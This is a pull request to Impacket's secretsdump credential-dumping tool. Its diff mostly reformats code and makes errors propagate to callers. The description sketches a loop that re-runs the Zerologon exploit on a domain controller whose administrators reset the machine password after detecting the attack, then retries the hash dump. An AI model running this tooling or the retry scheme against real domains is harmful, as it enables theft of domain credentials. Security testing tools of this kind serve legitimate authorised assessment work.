### PR TITLE
[secretsdump] Enhance error propagation

### DIFF
--- a/examples/secretsdump.py
+++ b/examples/secretsdump.py
@@ -62,16 +62,24 @@ from impacket.examples.utils import parse_target
 from impacket.smbconnection import SMBConnection
 from impacket.ldap.ldap import LDAPConnection, LDAPSessionError
 
-from impacket.examples.secretsdump import LocalOperations, RemoteOperations, SAMHashes, LSASecrets, NTDSHashes, \
-    KeyListSecrets
+from impacket.examples.secretsdump import (
+    LocalOperations,
+    RemoteOperations,
+    SAMHashes,
+    LSASecrets,
+    NTDSHashes,
+    KeyListSecrets,
+)
 from impacket.krb5.keytab import Keytab
+
 try:
     input = raw_input
 except NameError:
     pass
 
+
 class DumpSecrets:
-    def __init__(self, remoteName, username='', password='', domain='', options=None):
+    def __init__(self, remoteName, username="", password="", domain="", options=None):
         self.__useVSSMethod = options.use_vss
         self.__useKeyListMethod = options.use_keylist
         self.__remoteName = remoteName
@@ -79,8 +87,8 @@ class DumpSecrets:
         self.__username = username
         self.__password = password
         self.__domain = domain
-        self.__lmhash = ''
-        self.__nthash = ''
+        self.__lmhash = ""
+        self.__nthash = ""
         self.__aesKey = options.aesKey
         self.__aesKeyRodc = options.rodcKey
         self.__smbConnection = None
@@ -106,22 +114,35 @@ class DumpSecrets:
         self.__justUser = options.just_dc_user
         self.__ldapFilter = options.ldapfilter
         self.__pwdLastSet = options.pwd_last_set
-        self.__printUserStatus= options.user_status
+        self.__printUserStatus = options.user_status
         self.__resumeFileName = options.resumefile
         self.__canProcessSAMLSA = True
         self.__kdcHost = options.dc_ip
         self.__options = options
 
         if options.hashes is not None:
-            self.__lmhash, self.__nthash = options.hashes.split(':')
+            self.__lmhash, self.__nthash = options.hashes.split(":")
 
     def connect(self):
         self.__smbConnection = SMBConnection(self.__remoteName, self.__remoteHost)
         if self.__doKerberos:
-            self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,
-                                               self.__nthash, self.__aesKey, self.__kdcHost)
+            self.__smbConnection.kerberosLogin(
+                self.__username,
+                self.__password,
+                self.__domain,
+                self.__lmhash,
+                self.__nthash,
+                self.__aesKey,
+                self.__kdcHost,
+            )
         else:
-            self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+            self.__smbConnection.login(
+                self.__username,
+                self.__password,
+                self.__domain,
+                self.__lmhash,
+                self.__nthash,
+            )
 
     def ldapConnect(self):
         if self.__doKerberos:
@@ -134,111 +155,184 @@ class DumpSecrets:
 
         # Create the baseDN
         if self.__domain:
-            domainParts = self.__domain.split('.')
+            domainParts = self.__domain.split(".")
         else:
-            domain = self.__target.split('.', 1)[-1]
-            domainParts = domain.split('.')
-        self.baseDN = ''
+            domain = self.__target.split(".", 1)[-1]
+            domainParts = domain.split(".")
+        self.baseDN = ""
         for i in domainParts:
-            self.baseDN += 'dc=%s,' % i
+            self.baseDN += "dc=%s," % i
         # Remove last ','
         self.baseDN = self.baseDN[:-1]
 
         try:
-            self.__ldapConnection = LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcHost)
+            self.__ldapConnection = LDAPConnection(
+                "ldap://%s" % self.__target, self.baseDN, self.__kdcHost
+            )
             if self.__doKerberos is not True:
-                self.__ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+                self.__ldapConnection.login(
+                    self.__username,
+                    self.__password,
+                    self.__domain,
+                    self.__lmhash,
+                    self.__nthash,
+                )
             else:
-                self.__ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
-                                                    self.__aesKey, kdcHost=self.__kdcHost)
+                self.__ldapConnection.kerberosLogin(
+                    self.__username,
+                    self.__password,
+                    self.__domain,
+                    self.__lmhash,
+                    self.__nthash,
+                    self.__aesKey,
+                    kdcHost=self.__kdcHost,
+                )
         except LDAPSessionError as e:
-            if str(e).find('strongerAuthRequired') >= 0:
+            if str(e).find("strongerAuthRequired") >= 0:
                 # We need to try SSL
-                self.__ldapConnection = LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
+                self.__ldapConnection = LDAPConnection(
+                    "ldaps://%s" % self.__target, self.baseDN, self.__kdcHost
+                )
                 if self.__doKerberos is not True:
-                    self.__ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+                    self.__ldapConnection.login(
+                        self.__username,
+                        self.__password,
+                        self.__domain,
+                        self.__lmhash,
+                        self.__nthash,
+                    )
                 else:
-                    self.__ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
-                                                        self.__aesKey, kdcHost=self.__kdcHost)
+                    self.__ldapConnection.kerberosLogin(
+                        self.__username,
+                        self.__password,
+                        self.__domain,
+                        self.__lmhash,
+                        self.__nthash,
+                        self.__aesKey,
+                        kdcHost=self.__kdcHost,
+                    )
             else:
                 raise
 
     def dump(self):
         try:
-            if self.__remoteName.upper() == 'LOCAL' and self.__username == '':
+            if self.__remoteName.upper() == "LOCAL" and self.__username == "":
                 self.__isRemote = False
                 self.__useVSSMethod = True
                 if self.__systemHive:
                     localOperations = LocalOperations(self.__systemHive)
                     bootKey = localOperations.getBootKey()
                     if self.__ntdsFile is not None:
-                    # Let's grab target's configuration about LM Hashes storage
+                        # Let's grab target's configuration about LM Hashes storage
                         self.__noLMHash = localOperations.checkNoLMHashPolicy()
                 else:
                     import binascii
+
                     bootKey = binascii.unhexlify(self.__bootkey)
 
             else:
                 self.__isRemote = True
                 bootKey = None
                 if self.__ldapFilter is not None:
-                    logging.info('Querying %s for information about domain users via LDAP' % self.__domain)
+                    logging.info(
+                        "Querying %s for information about domain users via LDAP"
+                        % self.__domain
+                    )
                     try:
                         self.ldapConnect()
                     except Exception as e:
-                        logging.error('LDAP connection failed: %s' % str(e))
+                        logging.error("LDAP connection failed: %s" % str(e))
                 try:
                     try:
                         self.connect()
                     except Exception as e:
-                        if os.getenv('KRB5CCNAME') is not None and self.__doKerberos is True:
+                        if (
+                            os.getenv("KRB5CCNAME") is not None
+                            and self.__doKerberos is True
+                        ):
                             # SMBConnection failed. That might be because there was no way to log into the
                             # target system. We just have a last resort. Hope we have tickets cached and that they
                             # will work
-                            logging.debug('SMBConnection didn\'t work, hoping Kerberos will help (%s)' % str(e))
+                            logging.debug(
+                                "SMBConnection didn't work, hoping Kerberos will help (%s)"
+                                % str(e)
+                            )
                             pass
                         else:
                             raise
 
-                    self.__remoteOps  = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost, self.__ldapConnection)
+                    self.__remoteOps = RemoteOperations(
+                        self.__smbConnection,
+                        self.__doKerberos,
+                        self.__kdcHost,
+                        self.__ldapConnection,
+                    )
                     self.__remoteOps.setExecMethod(self.__options.exec_method)
-                    if self.__justDC is False and self.__justDCNTLM is False and self.__useKeyListMethod is False or self.__useVSSMethod is True:
+                    if (
+                        self.__justDC is False
+                        and self.__justDCNTLM is False
+                        and self.__useKeyListMethod is False
+                        or self.__useVSSMethod is True
+                    ):
                         self.__remoteOps.enableRegistry()
                         bootKey = self.__remoteOps.getBootKey()
                         # Let's check whether target system stores LM Hashes
                         self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
                 except Exception as e:
                     self.__canProcessSAMLSA = False
-                    if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \
-                        and self.__doKerberos is True:
+                    if (
+                        str(e).find("STATUS_USER_SESSION_DELETED")
+                        and os.getenv("KRB5CCNAME") is not None
+                        and self.__doKerberos is True
+                    ):
                         # Giving some hints here when SPN target name validation is set to something different to Off
                         # This will prevent establishing SMB connections using TGS for SPNs different to cifs/
-                        logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user')
+                        logging.error(
+                            "Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user"
+                        )
                     else:
-                        logging.error('RemoteOperations failed: %s' % str(e))
+                        logging.error("RemoteOperations failed: %s" % str(e))
+
+                    # Climbing up
+                    raise e
 
             # If the KerberosKeyList method is enable we dump the secrets only via TGS-REQ
             if self.__useKeyListMethod is True:
                 try:
-                    self.__KeyListSecrets = KeyListSecrets(self.__domain, self.__remoteName, self.__rodc, self.__aesKeyRodc, self.__remoteOps)
+                    self.__KeyListSecrets = KeyListSecrets(
+                        self.__domain,
+                        self.__remoteName,
+                        self.__rodc,
+                        self.__aesKeyRodc,
+                        self.__remoteOps,
+                    )
                     self.__KeyListSecrets.dump()
                 except Exception as e:
-                    logging.error('Something went wrong with the Kerberos Key List approach.: %s' % str(e))
+                    logging.error(
+                        "Something went wrong with the Kerberos Key List approach.: %s"
+                        % str(e)
+                    )
             else:
                 # If RemoteOperations succeeded, then we can extract SAM and LSA
-                if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
+                if (
+                    self.__justDC is False
+                    and self.__justDCNTLM is False
+                    and self.__canProcessSAMLSA
+                ):
                     try:
                         if self.__isRemote is True:
                             SAMFileName = self.__remoteOps.saveSAM()
                         else:
                             SAMFileName = self.__samHive
 
-                        self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)
+                        self.__SAMHashes = SAMHashes(
+                            SAMFileName, bootKey, isRemote=self.__isRemote
+                        )
                         self.__SAMHashes.dump()
                         if self.__outputFileName is not None:
                             self.__SAMHashes.export(self.__outputFileName)
                     except Exception as e:
-                        logging.error('SAM hashes extraction failed: %s' % str(e))
+                        logging.error("SAM hashes extraction failed: %s" % str(e))
 
                     try:
                         if self.__isRemote is True:
@@ -246,8 +340,13 @@ class DumpSecrets:
                         else:
                             SECURITYFileName = self.__securityHive
 
-                        self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps,
-                                                       isRemote=self.__isRemote, history=self.__history)
+                        self.__LSASecrets = LSASecrets(
+                            SECURITYFileName,
+                            bootKey,
+                            self.__remoteOps,
+                            isRemote=self.__isRemote,
+                            history=self.__history,
+                        )
                         self.__LSASecrets.dumpCachedHashes()
                         if self.__outputFileName is not None:
                             self.__LSASecrets.exportCached(self.__outputFileName)
@@ -257,73 +356,97 @@ class DumpSecrets:
                     except Exception as e:
                         if logging.getLogger().level == logging.DEBUG:
                             import traceback
+
                             traceback.print_exc()
-                        logging.error('LSA hashes extraction failed: %s' % str(e))
+                        logging.error("LSA hashes extraction failed: %s" % str(e))
 
                 # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
                 if self.__isRemote is True:
-                    if self.__useVSSMethod and self.__remoteOps is not None and self.__remoteOps.getRRP() is not None:
+                    if (
+                        self.__useVSSMethod
+                        and self.__remoteOps is not None
+                        and self.__remoteOps.getRRP() is not None
+                    ):
                         NTDSFileName = self.__remoteOps.saveNTDS()
                     else:
                         NTDSFileName = None
                 else:
                     NTDSFileName = self.__ntdsFile
 
-                self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,
-                                               noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,
-                                               useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,
-                                               pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,
-                                               outputFileName=self.__outputFileName, justUser=self.__justUser,
-                                               ldapFilter=self.__ldapFilter, printUserStatus=self.__printUserStatus)
+                self.__NTDSHashes = NTDSHashes(
+                    NTDSFileName,
+                    bootKey,
+                    isRemote=self.__isRemote,
+                    history=self.__history,
+                    noLMHash=self.__noLMHash,
+                    remoteOps=self.__remoteOps,
+                    useVSSMethod=self.__useVSSMethod,
+                    justNTLM=self.__justDCNTLM,
+                    pwdLastSet=self.__pwdLastSet,
+                    resumeSession=self.__resumeFileName,
+                    outputFileName=self.__outputFileName,
+                    justUser=self.__justUser,
+                    ldapFilter=self.__ldapFilter,
+                    printUserStatus=self.__printUserStatus,
+                )
                 try:
                     self.__NTDSHashes.dump()
                 except Exception as e:
                     if logging.getLogger().level == logging.DEBUG:
                         import traceback
+
                         traceback.print_exc()
-                    if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
+                    if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0:
                         # We don't store the resume file if this error happened, since this error is related to lack
                         # of enough privileges to access DRSUAPI.
                         resumeFile = self.__NTDSHashes.getResumeSessionFile()
                         if resumeFile is not None:
                             os.unlink(resumeFile)
                     logging.error(e)
-                    if (self.__justUser or self.__ldapFilter) and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >= 0:
-                        logging.info("You just got that error because there might be some duplicates of the same name. "
-                                     "Try specifying the domain name for the user as well. It is important to specify it "
-                                     "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
+                    if (self.__justUser or self.__ldapFilter) and str(e).find(
+                        "ERROR_DS_NAME_ERROR_NOT_UNIQUE"
+                    ) >= 0:
+                        logging.info(
+                            "You just got that error because there might be some duplicates of the same name. "
+                            "Try specifying the domain name for the user as well. It is important to specify it "
+                            "in the form of NetBIOS domain name/user (e.g. contoso/Administratror)."
+                        )
                     elif self.__useVSSMethod is False:
-                        logging.info('Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter')
+                        logging.info(
+                            "Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter"
+                        )
                 self.cleanup()
         except (Exception, KeyboardInterrupt) as e:
             if logging.getLogger().level == logging.DEBUG:
                 import traceback
+
                 traceback.print_exc()
             logging.error(e)
             if self.__NTDSHashes is not None:
                 if isinstance(e, KeyboardInterrupt):
                     while True:
-                        answer =  input("Delete resume session file? [y/N] ")
-                        if answer.upper() == '':
-                            answer = 'N'
+                        answer = input("Delete resume session file? [y/N] ")
+                        if answer.upper() == "":
+                            answer = "N"
                             break
-                        elif answer.upper() == 'Y':
-                            answer = 'Y'
+                        elif answer.upper() == "Y":
+                            answer = "Y"
                             break
-                        elif answer.upper() == 'N':
-                            answer = 'N'
+                        elif answer.upper() == "N":
+                            answer = "N"
                             break
-                    if answer == 'Y':
+                    if answer == "Y":
                         resumeFile = self.__NTDSHashes.getResumeSessionFile()
                         if resumeFile is not None:
                             os.unlink(resumeFile)
             try:
                 self.cleanup()
             except:
-                pass
+                # Raising here allow better development interoperability
+                raise e
 
     def cleanup(self):
-        logging.info('Cleaning up... ')
+        logging.info("Cleaning up... ")
         if self.__remoteOps:
             self.__remoteOps.finish()
         if self.__SAMHashes:
@@ -337,75 +460,168 @@ class DumpSecrets:
 
 
 # Process command-line arguments.
-if __name__ == '__main__':
+if __name__ == "__main__":
     # Explicitly changing the stdout encoding format
     if sys.stdout.encoding is None:
         # Output is redirected to a file
-        sys.stdout = codecs.getwriter('utf8')(sys.stdout)
+        sys.stdout = codecs.getwriter("utf8")(sys.stdout)
 
     print(version.BANNER)
 
-    parser = argparse.ArgumentParser(add_help = True, description = "Performs various techniques to dump secrets from "
-                                                      "the remote machine without executing any agent there.")
+    parser = argparse.ArgumentParser(
+        add_help=True,
+        description="Performs various techniques to dump secrets from "
+        "the remote machine without executing any agent there.",
+    )
 
-    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address> or LOCAL'
-                                                       ' (if you want to parse local files)')
-    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
-    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
-    parser.add_argument('-system', action='store', help='SYSTEM hive to parse')
-    parser.add_argument('-bootkey', action='store', help='bootkey for SYSTEM hive')
-    parser.add_argument('-security', action='store', help='SECURITY hive to parse')
-    parser.add_argument('-sam', action='store', help='SAM hive to parse')
-    parser.add_argument('-ntds', action='store', help='NTDS.DIT file to parse')
-    parser.add_argument('-resumefile', action='store', help='resume file name to resume NTDS.DIT session dump (only '
-                         'available to DRSUAPI approach). This file will also be used to keep updating the session\'s '
-                         'state')
-    parser.add_argument('-outputfile', action='store',
-                        help='base output filename. Extensions will be added for sam, secrets, cached and ntds')
-    parser.add_argument('-use-vss', action='store_true', default=False,
-                        help='Use the VSS method instead of default DRSUAPI')
-    parser.add_argument('-rodcNo', action='store', type=int, help='Number of the RODC krbtgt account (only avaiable for Kerb-Key-List approach)')
-    parser.add_argument('-rodcKey', action='store', help='AES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach)')
-    parser.add_argument('-use-keylist', action='store_true', default=False,
-                        help='Use the Kerb-Key-List method instead of default DRSUAPI')
-    parser.add_argument('-exec-method', choices=['smbexec', 'wmiexec', 'mmcexec'], nargs='?', default='smbexec', help='Remote exec '
-                        'method to use at target (only when using -use-vss). Default: smbexec')
+    parser.add_argument(
+        "target",
+        action="store",
+        help="[[domain/]username[:password]@]<targetName or address> or LOCAL"
+        " (if you want to parse local files)",
+    )
+    parser.add_argument(
+        "-ts", action="store_true", help="Adds timestamp to every logging output"
+    )
+    parser.add_argument("-debug", action="store_true", help="Turn DEBUG output ON")
+    parser.add_argument("-system", action="store", help="SYSTEM hive to parse")
+    parser.add_argument("-bootkey", action="store", help="bootkey for SYSTEM hive")
+    parser.add_argument("-security", action="store", help="SECURITY hive to parse")
+    parser.add_argument("-sam", action="store", help="SAM hive to parse")
+    parser.add_argument("-ntds", action="store", help="NTDS.DIT file to parse")
+    parser.add_argument(
+        "-resumefile",
+        action="store",
+        help="resume file name to resume NTDS.DIT session dump (only "
+        "available to DRSUAPI approach). This file will also be used to keep updating the session's "
+        "state",
+    )
+    parser.add_argument(
+        "-outputfile",
+        action="store",
+        help="base output filename. Extensions will be added for sam, secrets, cached and ntds",
+    )
+    parser.add_argument(
+        "-use-vss",
+        action="store_true",
+        default=False,
+        help="Use the VSS method instead of default DRSUAPI",
+    )
+    parser.add_argument(
+        "-rodcNo",
+        action="store",
+        type=int,
+        help="Number of the RODC krbtgt account (only avaiable for Kerb-Key-List approach)",
+    )
+    parser.add_argument(
+        "-rodcKey",
+        action="store",
+        help="AES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach)",
+    )
+    parser.add_argument(
+        "-use-keylist",
+        action="store_true",
+        default=False,
+        help="Use the Kerb-Key-List method instead of default DRSUAPI",
+    )
+    parser.add_argument(
+        "-exec-method",
+        choices=["smbexec", "wmiexec", "mmcexec"],
+        nargs="?",
+        default="smbexec",
+        help="Remote exec "
+        "method to use at target (only when using -use-vss). Default: smbexec",
+    )
 
-    group = parser.add_argument_group('display options')
-    group.add_argument('-just-dc-user', action='store', metavar='USERNAME',
-                       help='Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. '
-                            'Implies also -just-dc switch')
-    group.add_argument('-ldapfilter', action='store', metavar='LDAPFILTER',
-                       help='Extract only NTDS.DIT data for specific users based on an LDAP filter. '
-                            'Only available for DRSUAPI approach. Implies also -just-dc switch')
-    group.add_argument('-just-dc', action='store_true', default=False,
-                        help='Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)')
-    group.add_argument('-just-dc-ntlm', action='store_true', default=False,
-                       help='Extract only NTDS.DIT data (NTLM hashes only)')
-    group.add_argument('-pwd-last-set', action='store_true', default=False,
-                       help='Shows pwdLastSet attribute for each NTDS.DIT account. Doesn\'t apply to -outputfile data')
-    group.add_argument('-user-status', action='store_true', default=False,
-                        help='Display whether or not the user is disabled')
-    group.add_argument('-history', action='store_true', help='Dump password history, and LSA secrets OldVal')
+    group = parser.add_argument_group("display options")
+    group.add_argument(
+        "-just-dc-user",
+        action="store",
+        metavar="USERNAME",
+        help="Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. "
+        "Implies also -just-dc switch",
+    )
+    group.add_argument(
+        "-ldapfilter",
+        action="store",
+        metavar="LDAPFILTER",
+        help="Extract only NTDS.DIT data for specific users based on an LDAP filter. "
+        "Only available for DRSUAPI approach. Implies also -just-dc switch",
+    )
+    group.add_argument(
+        "-just-dc",
+        action="store_true",
+        default=False,
+        help="Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)",
+    )
+    group.add_argument(
+        "-just-dc-ntlm",
+        action="store_true",
+        default=False,
+        help="Extract only NTDS.DIT data (NTLM hashes only)",
+    )
+    group.add_argument(
+        "-pwd-last-set",
+        action="store_true",
+        default=False,
+        help="Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data",
+    )
+    group.add_argument(
+        "-user-status",
+        action="store_true",
+        default=False,
+        help="Display whether or not the user is disabled",
+    )
+    group.add_argument(
+        "-history",
+        action="store_true",
+        help="Dump password history, and LSA secrets OldVal",
+    )
 
-    group = parser.add_argument_group('authentication')
-    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
-    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
-    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
-                             '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'
-                             ' the ones specified in the command line')
-    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
-                                                                            ' (128 or 256 bits)')
-    group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file')
+    group = parser.add_argument_group("authentication")
+    group.add_argument(
+        "-hashes",
+        action="store",
+        metavar="LMHASH:NTHASH",
+        help="NTLM hashes, format is LMHASH:NTHASH",
+    )
+    group.add_argument(
+        "-no-pass", action="store_true", help="don't ask for password (useful for -k)"
+    )
+    group.add_argument(
+        "-k",
+        action="store_true",
+        help="Use Kerberos authentication. Grabs credentials from ccache file "
+        "(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use"
+        " the ones specified in the command line",
+    )
+    group.add_argument(
+        "-aesKey",
+        action="store",
+        metavar="hex key",
+        help="AES key to use for Kerberos Authentication" " (128 or 256 bits)",
+    )
+    group.add_argument(
+        "-keytab", action="store", help="Read keys for SPN from keytab file"
+    )
 
-    group = parser.add_argument_group('connection')
-    group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
-                                 'ommited it use the domain part (FQDN) specified in the target parameter')
-    group.add_argument('-target-ip', action='store', metavar="ip address",
-                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
-                            'This is useful when target is the NetBIOS name and you cannot resolve it')
+    group = parser.add_argument_group("connection")
+    group.add_argument(
+        "-dc-ip",
+        action="store",
+        metavar="ip address",
+        help="IP Address of the domain controller. If "
+        "ommited it use the domain part (FQDN) specified in the target parameter",
+    )
+    group.add_argument(
+        "-target-ip",
+        action="store",
+        metavar="ip address",
+        help="IP Address of the target machine. If omitted it will use whatever was specified as target. "
+        "This is useful when target is the NetBIOS name and you cannot resolve it",
+    )
 
-    if len(sys.argv)==1:
+    if len(sys.argv) == 1:
         parser.print_help()
         sys.exit(1)
 
@@ -425,47 +641,68 @@ if __name__ == '__main__':
 
     if options.just_dc_user is not None or options.ldapfilter is not None:
         if options.use_vss is True:
-            logging.error('-just-dc-user switch is not supported in VSS mode')
+            logging.error("-just-dc-user switch is not supported in VSS mode")
             sys.exit(1)
         elif options.resumefile is not None:
-            logging.error('resuming a previous NTDS.DIT dump session not compatible with -just-dc-user switch')
+            logging.error(
+                "resuming a previous NTDS.DIT dump session not compatible with -just-dc-user switch"
+            )
             sys.exit(1)
-        elif remoteName.upper() == 'LOCAL' and username == '':
-            logging.error('-just-dc-user not compatible in LOCAL mode')
+        elif remoteName.upper() == "LOCAL" and username == "":
+            logging.error("-just-dc-user not compatible in LOCAL mode")
             sys.exit(1)
         else:
             # Having this switch on implies not asking for anything else.
             options.just_dc = True
 
     if options.use_vss is True and options.resumefile is not None:
-        logging.error('resuming a previous NTDS.DIT dump session is not supported in VSS mode')
+        logging.error(
+            "resuming a previous NTDS.DIT dump session is not supported in VSS mode"
+        )
         sys.exit(1)
 
-    if options.use_keylist is True and (options.rodcNo is None or options.rodcKey is None):
-        logging.error('Both the RODC ID number and the RODC key are required for the Kerb-Key-List approach')
+    if options.use_keylist is True and (
+        options.rodcNo is None or options.rodcKey is None
+    ):
+        logging.error(
+            "Both the RODC ID number and the RODC key are required for the Kerb-Key-List approach"
+        )
         sys.exit(1)
 
-    if remoteName.upper() == 'LOCAL' and username == '' and options.resumefile is not None:
-        logging.error('resuming a previous NTDS.DIT dump session is not supported in LOCAL mode')
+    if (
+        remoteName.upper() == "LOCAL"
+        and username == ""
+        and options.resumefile is not None
+    ):
+        logging.error(
+            "resuming a previous NTDS.DIT dump session is not supported in LOCAL mode"
+        )
         sys.exit(1)
 
-    if remoteName.upper() == 'LOCAL' and username == '':
+    if remoteName.upper() == "LOCAL" and username == "":
         if options.system is None and options.bootkey is None:
-            logging.error('Either the SYSTEM hive or bootkey is required for local parsing, check help')
+            logging.error(
+                "Either the SYSTEM hive or bootkey is required for local parsing, check help"
+            )
             sys.exit(1)
     else:
-
         if options.target_ip is None:
             options.target_ip = remoteName
 
         if domain is None:
-            domain = ''
+            domain = ""
 
         if options.keytab is not None:
             Keytab.loadKeysFromKeytab(options.keytab, username, domain, options)
             options.k = True
 
-        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
+        if (
+            password == ""
+            and username != ""
+            and options.hashes is None
+            and options.no_pass is False
+            and options.aesKey is None
+        ):
             from getpass import getpass
 
             password = getpass("Password:")
@@ -479,5 +716,6 @@ if __name__ == '__main__':
     except Exception as e:
         if logging.getLogger().level == logging.DEBUG:
             import traceback
+
             traceback.print_exc()
         logging.error(e)


### PR DESCRIPTION
Hello everyone,

This may seem trivial, but I encountered this problem when I wanted to develop a small script around the `DumpSecrets` class. Indeed, I wanted to automatically exploit my target if the dump failed on the second pass.

For example, if a DC fights the CVE-2020-1472 with the `Reset-ComputerMachinePassword` cmdlet after detecting some event codes, the attack must be replayed before dumping several secrets successively. 🤖

Adding this exception propagation allow developers to do things like this:
```python3
# ...
dumping_counter = 0
def dumping() -> None:
	"""Dumping with control."""
	print(f"[*] Trying to dump for time number {dumping_counter}")
	if dumping_counter == 3:
		print("[-] Ok. White flag for me")
	try:
		dumper.dump()
	except Exception as exc:
		dumping_counter += 1
		print("[*] Exploiting again.")
		zerologon()
		dumping()
	else:
		print("[+] Dumped")
```

Thanks in advance for your attention 💜